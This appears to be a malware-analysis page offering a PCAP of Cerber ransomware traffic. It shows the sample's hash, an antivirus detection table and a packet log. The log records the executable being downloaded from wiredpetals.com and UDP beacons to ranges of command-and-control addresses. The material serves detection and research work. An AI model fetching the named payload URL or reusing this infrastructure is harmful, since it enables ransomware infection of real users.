wiredpetals.com 1224.exe Cerber Ransomware Malware Trojan PCAP File download traffic analysis

Download Attachments

  • 1224 (pcap), 53 KB. Date added: January 16, 2017 7:06 am. Added by: admin.
SHA256: 3bdf2bac5602f1ba204ca4d40ca223a8f26c016b95c7f6bc840f60ec25a864f1
File name: 1224.exe
Detection ratio: 45 / 57
Analysis date: 2017-01-16 07:02:05 UTC
Engine                   Result                                        Update
AhnLab-V3                Trojan/Win32.Cerber.R193005                   20170116
Arcabit                  Trojan.Generic.D3EED17                        20170116
Avast                    Win32:Malware-gen                             20170116
Avira (no cloud)         TR/Injector.cktso                             20170115
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9997    20170113
BitDefender              Trojan.GenericKD.4123927                      20170116
CAT-QuickHeal            Trojan.Inject                                 20170116
ClamAV                   Win.Trojan.Agent-5485292-0                    20170116
Comodo                   UnclassifiedMalware                           20170116
CrowdStrike Falcon (ML)  malicious_confidence_83% (W)                  20161024
Cyren                    W32/Trojan.TCRK-3050                          20170116
DrWeb                    Trojan.Encoder.7453                           20170116
ESET-NOD32               a variant of Win32/Injector.DJKD              20170116
Emsisoft                 Trojan.GenericKD.4123927 (B)                  20170116
F-Secure                 Trojan.Generic.20219229                       20170116
Fortinet                 W32/Injector.DJKD!tr                          20170116
GData                    Trojan.GenericKD.4123927                      20170116

2017-01-16 00:20:05.399538 IP 192.168.1.102.63361 > 216.250.121.64.80: Flags [P.], seq 0:290, ack 1, win 256, length 290: HTTP: GET /new/1224.exe HTTP/1.1
E..Jqr@…s….f..y@…P.W0!k$7`P…a…GET /new/1224.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: wiredpetals.com
Connection: Keep-Alive

2017-01-16 00:21:02.186427 IP 192.168.1.102.61992 > 15.44.20.0.6892: UDP, length 25
E..5u……….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186490 IP 192.168.1.102.61992 > 15.44.20.1.6892: UDP, length 25
E..5:Q…..,…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186499 IP 192.168.1.102.61992 > 15.44.20.2.6892: UDP, length 25
E..5Rw………f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186593 IP 192.168.1.102.61992 > 15.44.20.3.6892: UDP, length 25
E..5……8l…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186603 IP 192.168.1.102.61992 > 15.44.20.4.6892: UDP, length 25
E..5&…../….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186717 IP 192.168.1.102.61992 > 15.44.20.5.6892: UDP, length 25
E..5j……u…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186725 IP 192.168.1.102.61992 > 15.44.20.6.6892: UDP, length 25
E..5……T….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186775 IP 192.168.1.102.61992 > 15.44.20.7.6892: UDP, length 25
E..5N)…..N…f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186849 IP 192.168.1.102.61992 > 15.44.20.8.6892: UDP, length 25
E..5……9….f.,…(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186858 IP 192.168.1.102.61992 > 15.44.20.9.6892: UDP, length 25
E..5S……….f.,.     .(…!..9973e23bd78600889501000d0
2017-01-16 00:21:02.186907 IP 192.168.1.102.61992 > 15.44.20.10.6892: UDP, length 25
E..5;……….f.,.
.(…!..9973e23bd78600889501000d0

2017-01-16 00:21:03.206140 IP 192.168.1.102.61992 > 91.239.25.241.6892: UDP, length 25
E..567………f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206190 IP 192.168.1.102.61992 > 91.239.25.242.6892: UDP, length 25
E..5N……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206248 IP 192.168.1.102.61992 > 91.239.25.243.6892: UDP, length 25
E..5…….:…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206303 IP 192.168.1.102.61992 > 91.239.25.244.6892: UDP, length 25
E..5:……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206353 IP 192.168.1.102.61992 > 91.239.25.245.6892: UDP, length 25
E..5    ……(…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206356 IP 192.168.1.102.61992 > 91.239.25.246.6892: UDP, length 25
E..5!……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206406 IP 192.168.1.102.61992 > 91.239.25.247.6892: UDP, length 25
E..5bk…..X…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206477 IP 192.168.1.102.61992 > 91.239.25.248.6892: UDP, length 25
E..5………..f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206527 IP 192.168.1.102.61992 > 91.239.25.249.6892: UDP, length 25
E..5O……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206531 IP 192.168.1.102.61992 > 91.239.25.250.6892: UDP, length 25
E..57……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206603 IP 192.168.1.102.61992 > 91.239.25.251.6892: UDP, length 25
E..5lh…..W…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206654 IP 192.168.1.102.61992 > 91.239.25.252.6892: UDP, length 25
E..5c……….f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206657 IP 192.168.1.102.61992 > 91.239.25.253.6892: UDP, length 25
E..5 \…..a…f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:03.206721 IP 192.168.1.102.61992 > 91.239.25.254.6892: UDP, length 25
E..5.8………f[….(…!..9973e23bd78600889501000d0
2017-01-16 00:21:04.198130 IP 192.168.1.102.61992 > 91.239.25.255.6892: UDP, length 25
E..5;……9…f[….(…!..9973e23bd78600889501000d0
